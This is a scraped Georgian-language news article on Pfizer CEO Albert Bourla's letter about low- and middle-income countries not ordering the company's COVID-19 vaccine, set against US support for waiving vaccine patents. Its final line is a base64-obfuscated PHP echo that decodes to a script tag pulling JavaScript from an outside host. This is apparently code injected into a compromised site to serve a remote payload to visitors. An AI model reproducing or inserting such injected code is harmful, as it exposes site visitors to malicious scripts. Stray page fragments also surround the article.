celsiusi
ავერსი საქკაბელი
დაბალი და საშუალო შემოსავლის მქონე ქვეყნებმა არჩევანი ჩვენი ვაქცინის შეკვეთაზე არ შეაჩერეს, – ამის შესახებ კომპანია „ფაიზერის“ ხელმძღვანელის ალბერტ ბურლას წერილშია აღნიშნული, სადაც ის კომპანიის თანამშრომლებს მიმართავს.
 
„ჩვენ დავუკავშირდით ყველა სახელმწიფოს და ვთხოვეთ, შეკვეთა გაეკეთებინათ, რათა მათთვის დოზები გამოგვეყო. მდიდარმა ქვეყნებმა დოზების უმეტესობა შეუკვეთეს. შევშფოთდი და პირადად მივწერე დაბალი და საშუალო შემოსავლების მქონე ქვეყნების ლიდერებს წერილები, ასევე დავურეკე ტელეფონით და მოვუწოდე, შეეკვეთათ დოზები, რადგან რაოდენობა შეზღუდული იყო“, – წერს ბურლა.
 
მისი თქმით, საშუალო და დაბალი შემოსავლების მქონე ქვეყნების უმეტესობამ სხვა ვაქცინების მწარმოებლებთან ამჯობინა კონტრაქტის დადება. ბურლას განმარტებით, ამის მიზეზი ან ის იყო, რომ „ფაიზერის“ ტექნოლოგია ჯერ გამოუცდელია, ან ის, რომ აღნიშნულმა ქვეყნებმა არჩევანი ადგილობრივი წარმოების ვაქცინებზე გააკეთეს.
 
მისივე თქმით, ზოგიერთ ქვეყანაში „ფაიზერის“ ვაქცინა საერთოდ არ დაამტკიცეს.
 
ალბერტ ბურლამ წერილი მას შემდეგ გამოაქვეყნა, რაც აშშ-ის პრეზიდენტის, ჯო ბაიდენის ადმინისტრაციაში განაცხადეს, რომ მხარს უჭერენ კორონავირუსის საწინააღმდეგო ვაქცინებზე ინტელექტუალური საკუთრების უფლების გაუქმებას იმ მიზნით, რომ პატენტები განვითარებადი ქვეყნებისთვისაც ხელმისაწვდომი გახდეს და შესაბამისად, ვაქცინების წარმოების მოცულობა გაიზარდოს.
1279
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");